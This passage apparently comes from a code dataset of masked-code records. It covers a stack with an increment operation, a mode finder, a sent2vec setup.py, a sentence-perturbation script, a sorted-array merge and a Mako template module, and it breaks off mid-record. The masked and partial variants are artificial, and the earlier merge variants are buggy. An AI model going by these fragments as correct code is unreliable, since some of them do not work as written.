s.inc(int(op[1]), int(op[2]))
print(s.peek())
if __name__ == '__main__':
operations_cnt = 0
operations_cnt = int(input())
operations_i = 0
operations = []
while operations_i < operations_cnt:
try:
operations_item = str(input())
except:
operations_item = None
operations.append(operations_item)
operations_i += 1
res = superStack(operations)
| #!/bin/python3
# Implement a stack with push, pop, inc(e, k) operations
# inc (e,k) - Add k to each of bottom e elements
import sys
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
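# A hypothetical trace (invented input, not from the original problem statement):
# superStack(["push 4", "push 9", "inc 2 1", "pop"])
# prints 4, then 9, then 10 (after adding 1 to the bottom 2 elements), then 5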
if __name__ == "__main__":
operations_cnt = 0
operations_cnt = int(input())
operations_i = 0
operations = []
while operations_i < operations_cnt:
try:
operations_item = str(input())
except:
operations_item = None
operations.append(operations_item)
operations_i += 1
    res = superStack(operations)
| [
4,
7,
8,
9,
10
] |
25 | 39f9341313e29a22ec5e05ce9371bf65e89c91bd | <mask token>
| <mask token>
for numbers in n_list:
n_dict = {}
for n in numbers:
if n in n_dict:
n_dict[n] += 1
else:
n_dict[n] = 1
mode = []
if len(n_dict) == 1 or len(n_dict) == len(numbers):
        print(numbers, '= none')
else:
mode_count = max(n_dict.values())
for e in n_dict.keys():
if n_dict[e] == mode_count:
mode.append(e)
print(numbers, '=', mode)
| <mask token>
n_list = [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91], [28, 30, 32, 34, 144],
[10, 10, 10, 10, 10]]
for numbers in n_list:
n_dict = {}
for n in numbers:
if n in n_dict:
n_dict[n] += 1
else:
n_dict[n] = 1
mode = []
if len(n_dict) == 1 or len(n_dict) == len(numbers):
        print(numbers, '= none')
else:
mode_count = max(n_dict.values())
for e in n_dict.keys():
if n_dict[e] == mode_count:
mode.append(e)
print(numbers, '=', mode)
| """
Write a program that finds the mode of the numbers in a list.
[12, 17, 19, 17, 23] = 17
[26, 37, 26, 37, 91] = 26, 37
[28, 30, 32, 34, 144] = none
Mode: the value that appears most often in the data.
① If the values are all identical or all different, there is no mode.
② Otherwise, every value whose frequency equals the largest frequency is a mode.
"""
n_list = [[12, 17, 19, 17, 23],
[26, 37, 26, 37, 91],
[28, 30, 32, 34, 144],
[10, 10, 10, 10, 10]]
for numbers in n_list:
n_dict = {}
for n in numbers:
if n in n_dict:
n_dict[n] += 1
else:
n_dict[n] = 1
mode = []
if len(n_dict) == 1 or len(n_dict) == len(numbers):
        print(numbers, '= none')
else:
mode_count = max(n_dict.values())
for e in n_dict.keys():
if n_dict[e] == mode_count:
mode.append(e)
print(numbers, '=', mode)
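# Expected output of the run above (assumption: executed as-is):
# [12, 17, 19, 17, 23] = [17]
# [26, 37, 26, 37, 91] = [26, 37]
# [28, 30, 32, 34, 144] = none
# [10, 10, 10, 10, 10] = none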
| null | [
0,
1,
2,
3
] |
26 | 312cc666c88fcd22882c49598db8c5e18bd3dae1 | <mask token>
| <mask token>
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
if platform == 'darwin':
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',
'-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
<mask token>
if cython:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
extensions = cythonize(extensions)
else:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
setup(name='sent2vec', version='0.1.0', author='', author_email='', url='',
description='A Python interface for sent2vec library', license=
'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,
install_requires=[], classifiers=[])
| <mask token>
cython = True
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
if platform == 'darwin':
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',
'-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
extensions = []
if cython:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
extensions = cythonize(extensions)
else:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
setup(name='sent2vec', version='0.1.0', author='', author_email='', url='',
description='A Python interface for sent2vec library', license=
'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,
install_requires=[], classifiers=[])
| from setuptools import setup, find_packages
from setuptools.extension import Extension
from sys import platform
cython = True
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
if platform == 'darwin':
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',
'-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
extensions = []
if cython:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
extensions = cythonize(extensions)
else:
extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=
extra_compile_args)]
setup(name='sent2vec', version='0.1.0', author='', author_email='', url='',
description='A Python interface for sent2vec library', license=
'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,
install_requires=[], classifiers=[])
| from setuptools import setup, find_packages
from setuptools.extension import Extension
from sys import platform
cython = True
try:
from Cython.Build import cythonize
cython = True
except ImportError:
cython = False
# Define the C++ extension
if platform == "darwin":
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x', '-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']
extensions = []
if cython:
extensions = [
Extension('sent2vec',
sources=[
'sent2vec/sent2vec.pyx',
'sent2vec/cpp/src/args.cc',
'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc',
'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc',
'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc',
'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'
],
language='c++',
extra_compile_args=extra_compile_args
)
]
extensions = cythonize(extensions)
else:
extensions = [
Extension('sent2vec',
sources=[
'sent2vec/sent2vec.cpp',
'sent2vec/cpp/src/args.cc',
'sent2vec/cpp/src/dictionary.cc',
'sent2vec/cpp/src/fasttext.cc',
'sent2vec/cpp/src/main.cc',
'sent2vec/cpp/src/matrix.cc',
'sent2vec/cpp/src/model.cc',
'sent2vec/cpp/src/productquantizer.cc',
'sent2vec/cpp/src/qmatrix.cc',
'sent2vec/cpp/src/utils.cc',
'sent2vec/cpp/src/vector.cc'
],
language='c++',
extra_compile_args=extra_compile_args
)
]
# Package details
setup(
name='sent2vec',
version='0.1.0',
author='',
author_email='',
url='',
description='A Python interface for sent2vec library',
license='BSD 3-Clause License',
packages=['sent2vec'],
ext_modules = extensions,
install_requires=[],
classifiers= []
)
| [
0,
1,
2,
3,
4
] |
27 | 2aec0581413d4fb0ffb4090231fde0fed974bf18 | <mask token>
| <mask token>
with open('./roc.txt', 'r') as fin:
with open('./roc_shuffle.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = [0] + np.random.permutation(range(1, 5)).tolist()
for sen in np.take(tmp, idx).tolist():
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_repeat.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = random.randint(1, 4)
tmp[idx] = tmp[idx][:-1] + tmp[idx]
for sen in tmp:
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_replace.txt', 'w') as fout:
post, tmp = [], []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
post.append(tmp)
tmp = []
else:
tmp.append(line.strip().split())
data = {'1': [], '2': [], '3': [], '4': [], '5': []}
for p in post:
for i in range(5):
data['%d' % (i + 1)].append(p[i])
random_data = data.copy()
for i in range(5):
random_data['%d' % (i + 1)] = np.random.permutation(random_data
['%d' % (i + 1)])
for k in range(len(post)):
idx = np.random.permutation(range(1, 5))[0]
for i in range(5):
if i == idx:
fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\n')
else:
fout.write(' '.join(data['%d' % (i + 1)][k]) + '\n')
fout.write('------\n')
| import numpy as np
import random
with open('./roc.txt', 'r') as fin:
with open('./roc_shuffle.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = [0] + np.random.permutation(range(1, 5)).tolist()
for sen in np.take(tmp, idx).tolist():
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_repeat.txt', 'w') as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = random.randint(1, 4)
tmp[idx] = tmp[idx][:-1] + tmp[idx]
for sen in tmp:
fout.write(sen + '\n')
tmp = []
fout.write(line.strip() + '\n')
else:
tmp.append(line.strip())
with open('./roc.txt', 'r') as fin:
with open('./roc_replace.txt', 'w') as fout:
post, tmp = [], []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
post.append(tmp)
tmp = []
else:
tmp.append(line.strip().split())
data = {'1': [], '2': [], '3': [], '4': [], '5': []}
for p in post:
for i in range(5):
data['%d' % (i + 1)].append(p[i])
random_data = data.copy()
for i in range(5):
random_data['%d' % (i + 1)] = np.random.permutation(random_data
['%d' % (i + 1)])
for k in range(len(post)):
idx = np.random.permutation(range(1, 5))[0]
for i in range(5):
if i == idx:
fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\n')
else:
fout.write(' '.join(data['%d' % (i + 1)][k]) + '\n')
fout.write('------\n')
| import numpy as np
import random
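# Build three perturbed copies of roc.txt, where every story is 5 sentences
# followed by a separator line (6 lines per record):
#   roc_shuffle.txt - keep sentence 1, randomly reorder sentences 2-5
#   roc_repeat.txt  - duplicate the text of one of sentences 2-5 in place
#   roc_replace.txt - swap one of sentences 2-5 with the same-position sentence of a random story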
with open("./roc.txt", "r") as fin:
with open("./roc_shuffle.txt", "w") as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = [0] + np.random.permutation(range(1,5)).tolist()
for sen in np.take(tmp, idx).tolist():
fout.write(sen+"\n")
tmp = []
fout.write(line.strip()+"\n")
else:
tmp.append(line.strip())
with open("./roc.txt", "r") as fin:
with open("./roc_repeat.txt", "w") as fout:
tmp = []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
idx = random.randint(1,4)
tmp[idx] = tmp[idx][:-1] + tmp[idx]
for sen in tmp:
fout.write(sen+"\n")
tmp = []
fout.write(line.strip()+"\n")
else:
tmp.append(line.strip())
with open("./roc.txt", "r") as fin:
with open("./roc_replace.txt", "w") as fout:
post, tmp = [], []
for k, line in enumerate(fin):
i = k + 1
if i % 6 == 0:
post.append(tmp)
tmp = []
else:
tmp.append(line.strip().split())
data = {"1":[], "2":[], "3":[], "4":[], "5":[]}
for p in post:
for i in range(5):
data["%d"%(i+1)].append(p[i])
random_data = data.copy()
for i in range(5):
random_data["%d"%(i+1)] = np.random.permutation(random_data["%d"%(i+1)])
for k in range(len(post)):
idx = np.random.permutation(range(1,5))[0]
for i in range(5):
if i == idx:
fout.write(' '.join(random_data["%d"%(i+1)][k])+"\n")
else:
fout.write(' '.join(data["%d"%(i+1)][k])+"\n")
fout.write("------\n") | null | [
0,
1,
2,
3
] |
28 | 4f13e2858d9cf469f14026808142886e5c3fcc85 | <mask token>
| class Solution:
<mask token>
<mask token>
| class Solution:
def merge(self, nums1, m, nums2, n):
"""
Do not return anything, modify nums1 in-place instead.
"""
if n == 0:
nums1 = nums1
if nums1[m - 1] <= nums2[0]:
for i in range(n):
nums1[m + i] = nums2[i]
elif nums1[0] >= nums2[-1]:
for i in range(m):
nums1[i] = nums1[n + i]
else:
ans = [None] * len(nums1)
i = 0
j = 0
k = 0
while i < m and j < n:
if nums1[i] <= nums2[j]:
print('take 1: ', nums1[i])
ans[k] = nums1[i]
i += 1
else:
print('take 2: ', nums2[j])
ans[k] = nums2[j]
j += 1
k += 1
nums1 = ans
<mask token>
| class Solution:
def merge(self, nums1, m, nums2, n):
"""
Do not return anything, modify nums1 in-place instead.
"""
if n == 0:
nums1 = nums1
if nums1[m - 1] <= nums2[0]:
for i in range(n):
nums1[m + i] = nums2[i]
elif nums1[0] >= nums2[-1]:
for i in range(m):
nums1[i] = nums1[n + i]
else:
ans = [None] * len(nums1)
i = 0
j = 0
k = 0
while i < m and j < n:
if nums1[i] <= nums2[j]:
print('take 1: ', nums1[i])
ans[k] = nums1[i]
i += 1
else:
print('take 2: ', nums2[j])
ans[k] = nums2[j]
j += 1
k += 1
nums1 = ans
if __name__ == '__main__':
solve = Solution()
nums1 = [1, 2, 3, 0, 0, 0]
m = 3
nums2 = [2, 5, 6]
n = 3
solve.merge(nums1, m, nums2, n)
print(nums1)
| class Solution:
    def merge(self, nums1, m, nums2, n):
        """
        Do not return anything, modify nums1 in-place instead.
        """
        if n == 0:  # nothing to merge
            return
        if m == 0:  # nums1 holds only placeholder slots
            nums1[:n] = nums2
            return
        if nums1[m-1] <= nums2[0]:
            # every element of nums2 belongs after nums1's real elements
            for i in range(n):
                nums1[m+i] = nums2[i]
        elif nums1[0] >= nums2[-1]:
            # every element of nums2 belongs before nums1's real elements:
            # shift nums1 right by n, then copy nums2 into the front
            for i in range(m-1, -1, -1):
                nums1[i+n] = nums1[i]
            for i in range(n):
                nums1[i] = nums2[i]
        else:
            ans = [None]*(m+n)
            i = j = k = 0
            while i < m and j < n:
                if nums1[i] <= nums2[j]:
                    ans[k] = nums1[i]
                    i += 1
                else:
                    ans[k] = nums2[j]
                    j += 1
                k += 1
            ans[k:] = nums1[i:m] if i < m else nums2[j:n]  # copy the leftover tail
            nums1[:] = ans  # slice-assign so the change is visible to the caller
if __name__ == "__main__":
solve = Solution()
nums1 = [1,2,3,0,0,0]
m = 3
nums2 = [2,5,6]
n = 3
solve.merge(nums1, m, nums2, n)
print(nums1)
| [
0,
1,
2,
3,
4
] |
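For comparison, the usual fully in-place answer to this merge contract (it matches LeetCode 88) fills nums1 from the back, so no auxiliary list is needed — a minimal sketch, not taken from the record above:

class Solution:
    def merge(self, nums1, m, nums2, n):
        i, j, k = m - 1, n - 1, m + n - 1
        while j >= 0:  # once nums2 is exhausted, nums1[0:i+1] is already in place
            if i >= 0 and nums1[i] > nums2[j]:
                nums1[k] = nums1[i]
                i -= 1
            else:
                nums1[k] = nums2[j]
                j -= 1
            k -= 1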
29 | 57967f36a45bb3ea62708bbbb5b2f4ddb0f4bb16 | <mask token>
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
<mask token>
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
<mask token>
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| <mask token>
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
<mask token>
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| <mask token>
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = (
'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
)
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
<mask token>
_exports = ['content']
<mask token>
now = datetime.now()
noww = now.strftime('%B %d, %Y')
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n')
__M_writer('\r\n')
        nowww = (now - timedelta(days=3)).strftime('%B %d, %Y')  # assumption: the template meant "3 days before now", formatted like noww
        __M_writer(str(nowww))
__M_writer('\r\n')
if 'parent' not in context._data or not hasattr(context._data[
'parent'], 'content'):
context['self'].content(**pageargs)
__M_writer('\r\n\r\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = (
'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
)
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
from datetime import datetime, timedelta
now = datetime.now()
noww = now.strftime('%B %d, %Y')
def _mako_get_namespace(context, name):
try:
return context.namespaces[__name__, name]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[__name__, name]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n')
__M_writer('\r\n')
        nowww = (now - timedelta(days=3)).strftime('%B %d, %Y')  # assumption: the template meant "3 days before now", formatted like noww
        __M_writer(str(nowww))
__M_writer('\r\n')
if 'parent' not in context._data or not hasattr(context._data[
'parent'], 'content'):
context['self'].content(**pageargs)
__M_writer('\r\n\r\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer(
'\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n'
)
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str(item.id))
__M_writer(
'" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="'
)
__M_writer(str(STATIC_URL))
__M_writer(str(item.photo.image))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str(noww))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str(item.price_per_day))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer(
'</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n'
)
if request.user.is_authenticated():
__M_writer(
' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n'
)
else:
__M_writer(
' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n'
)
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
<mask token>
| # -*- coding:ascii -*-
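# Python module auto-generated by Mako from templates/account.rentalcart.html;
# render_body() writes the page and render_content() the template's 'content' def.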
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = 'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
from datetime import datetime, timedelta
now = datetime.now()
noww = now.strftime('%B %d, %Y')
def _mako_get_namespace(context, name):
try:
return context.namespaces[(__name__, name)]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[(__name__, name)]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n')
__M_writer('\r\n')
        nowww = (now - timedelta(days=3)).strftime('%B %d, %Y')  # assumption: the template meant "3 days before now", formatted like noww
        __M_writer(str(nowww))
__M_writer('\r\n')
